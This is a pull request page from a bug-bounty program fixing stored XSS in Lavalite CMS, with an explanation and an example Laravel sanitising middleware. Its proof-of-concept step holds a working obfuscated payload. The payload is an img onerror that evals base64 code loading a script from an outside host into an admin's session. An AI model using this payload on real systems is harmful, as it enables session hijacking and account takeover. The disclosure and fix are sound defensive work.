This repository has been archived by the owner on Dec 19, 2023. It is now read-only.

Fix XSS #1

Merged
merged 1 commit into from
Oct 29, 2020
Merged

Fix XSS #1

merged 1 commit into from
Oct 29, 2020

Conversation


@alromh87 alromh87 commented Oct 22, 2020

📊 Metadata *

Bounty URL: https://www.huntr.dev/bounties/3-packagist-lavalite%2Fcms

⚙️ Description *

Admin cookies and other details leading to an account takeover to a higher privilege level from a client account of Lavalite CMS, and multiple other XSS in different pages due to acceptance of unsanitised data.

💻 Technical Description *

Fixed by implementing sanitizing middleware

🐛 Proof of Concept (PoC) *

  1. Log in to a client account and an admin account from entirely different browsers or through a private mode.
  2. In the client account click on settings, update the address column with the blind payload, and save the updates made:
     "><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYmVlZmVlLnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61; onerror=eval(atob(this.id))>
  3. From the admin account move to the endpoint http://localhost/admin/user/client.
  4. Booyah!!! XSS triggered.

[Screenshot 2020-10-22 14-38-42]

🔥 Proof of Fix (PoF) *

After the fix, all input will be sanitized prior to being inserted and HTML components will be stripped from input.

[Screenshot 2020-10-22 14-38-53]

👍 User Acceptance Testing (UAT)

Application works normally
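The PoC above plants the payload in the client's address field; the `id` attribute is base64 for `var a=document.createElement("script");a.src="https://beefee.xss.ht";document.body.appendChild(a);`, which `onerror=eval(atob(this.id))` executes in the admin's session as soon as the unescaped address is rendered at /admin/user/client (the trailing `&#61;` is the base64 `=` padding written as an entity so it survives inside the attribute). The PR only says the fix is "sanitizing middleware"; the following is an added example of what such a middleware looks like in Laravel, which Lavalite is built on. It is not the project's own code: the class name `StripHtmlTags`, the entries in `$except` and the registration step are assumptions for illustration, and it relies on Laravel's `Illuminate\Foundation\Http\Middleware\TransformsRequest` base class, the same one the framework's `TrimStrings` middleware extends.

```php
<?php

namespace App\Http\Middleware;

use Illuminate\Foundation\Http\Middleware\TransformsRequest;

/**
 * Added example of an input-sanitising middleware (hypothetical name, not the
 * lavalite/cms fix itself). TransformsRequest walks every string in the query
 * string, the form body and JSON input, nested arrays included (keys arrive
 * dotted, e.g. "profile.address"), and hands each one to transform().
 */
class StripHtmlTags extends TransformsRequest
{
    /**
     * Input keys that legitimately carry HTML, such as a page body edited in
     * the CMS's HTML code view, and therefore must be left untouched.
     * These names are assumptions for illustration only.
     *
     * @var array
     */
    protected $except = [
        'content',
        'page.content',
    ];

    /**
     * Strip markup from a single input value.
     *
     * @param  string  $key    dotted input key
     * @param  mixed   $value  raw input value
     * @return mixed
     */
    protected function transform($key, $value)
    {
        // Leave non-strings (numbers, booleans, uploaded files) and the
        // explicitly allowed HTML fields as they are.
        if (! is_string($value) || in_array($key, $this->except, true)) {
            return $value;
        }

        // strip_tags() removes the <img ...> element from the PoC payload in
        // its entirety, so the stored address can no longer carry an
        // onerror= handler; the stray leading '">' survives as harmless text.
        return strip_tags($value);
    }
}
```

Register the class in the global `$middleware` array of `app/Http/Kernel.php` so it runs on every request, before the controllers that write to the database. Stripping on input is defence in depth rather than the root-cause fix: it does nothing for rows stored before the middleware existed, and any view that renders a stored value raw remains exposed through other write paths. The address, and every other user-controlled field shown on admin pages, should therefore also be escaped at output with Blade's `{{ }}` syntax rather than `{!! !!}`. The `$except` list is where the trade-off raised in the review below (breaking the HTML code view in page creation) gets handled.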


@Mik317 Mik317 left a comment


LGTM 😄 🍰
I loved this fix - clear and simple ❤️

Maybe the fix will break the HTML code view in page creation, but it's 99% OK by my side 👍

Cheers,
Mik

@huntr-helper (Member) commented

Congratulations alromh87 - your fix has been selected! 🎉

Thanks for being part of the community & helping secure the world's open source code.
If you have any questions, please respond in the comments section, or hit us up on Discord. Your bounty is on its way - keep hunting!
